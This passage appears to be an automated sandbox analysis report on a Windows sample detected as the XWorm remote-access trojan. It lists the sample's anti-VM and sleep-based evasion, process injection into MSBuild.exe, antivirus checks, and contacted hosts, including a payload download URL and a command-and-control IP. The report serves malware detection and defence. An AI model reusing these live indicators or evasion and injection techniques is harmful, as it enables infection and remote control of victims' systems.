Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 147.45.44.42 tqvjt.exe PID: 5380, type: MEMORYSTR
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory allocated: A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory allocated: 2760000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory allocated: 4760000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1610000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 30C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 50C0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7849 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2005 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe TID: 5808 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe TID: 3632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4344 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6232 Thread sleep count: 7849 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6232 Thread sleep count: 2005 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: MSBuild.exe, 00000005.00000002.4035367781.0000000001562000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594297952.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.147.45.44.42 tqvjt.exe.2787984.3.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.147.45.44.42 tqvjt.exe.2787984.3.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.147.45.44.42 tqvjt.exe.2787984.3.raw.unpack, SetVeloCity.cs Reference to suspicious API methods: VirtualAllocExAction(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe File written: C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.0.cs Jump to dropped file
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000 Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000 Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 109A008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB31E.tmp" "c:\Users\user\AppData\Local\Temp\rjhqheow\CSCCA9215E6E5774A1BA7192FC2B24677.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Queries volume information: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\147.45.44.42 tqvjt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4034857521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1594780205.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4035947986.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 147.45.44.42 tqvjt.exe PID: 5380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5852, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4034857521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1594780205.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4035947986.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 147.45.44.42 tqvjt.exe PID: 5380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5852, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1614036 Sample: 147.45.44.42 tqvjt.exe Startdate: 13/02/2025 Architecture: WINDOWS Score: 100 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 15 other signatures 2->41 7 147.45.44.42 tqvjt.exe 15 10 2->7         started        process3 dnsIp4 31 147.45.44.42, 49705, 80 FREE-NET-ASFREEnetEU Russian Federation 7->31 25 C:\Users\user\AppData\...\rjhqheow.cmdline, Unicode 7->25 dropped 27 C:\Users\user\AppData\Local\...\rjhqheow.0.cs, Unicode 7->27 dropped 29 C:\Users\user\...\147.45.44.42 tqvjt.exe.log, CSV 7->29 dropped 43 Writes to foreign memory regions 7->43 45 Allocates memory in foreign processes 7->45 47 Injects a PE file into a foreign processes 7->47 12 MSBuild.exe 2 7->12         started        16 csc.exe 3 7->16         started        file5 signatures6 process7 dnsIp8 33 185.7.214.54, 4411, 49706 DELUNETDE France 12->33 49 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->49 23 C:\Users\user\AppData\Local\...\rjhqheow.dll, PE32 16->23 dropped 19 conhost.exe 16->19         started        21 cvtres.exe 1 16->21         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.44.42
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.7.214.54
 unknown France
42652 DELUNETDE true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
185.7.214.54 true
  • Avira URL Cloud: safe
 unknown
http://147.45.44.42/boom/tqvjt.exe true
  • Avira URL Cloud: malware
 unknown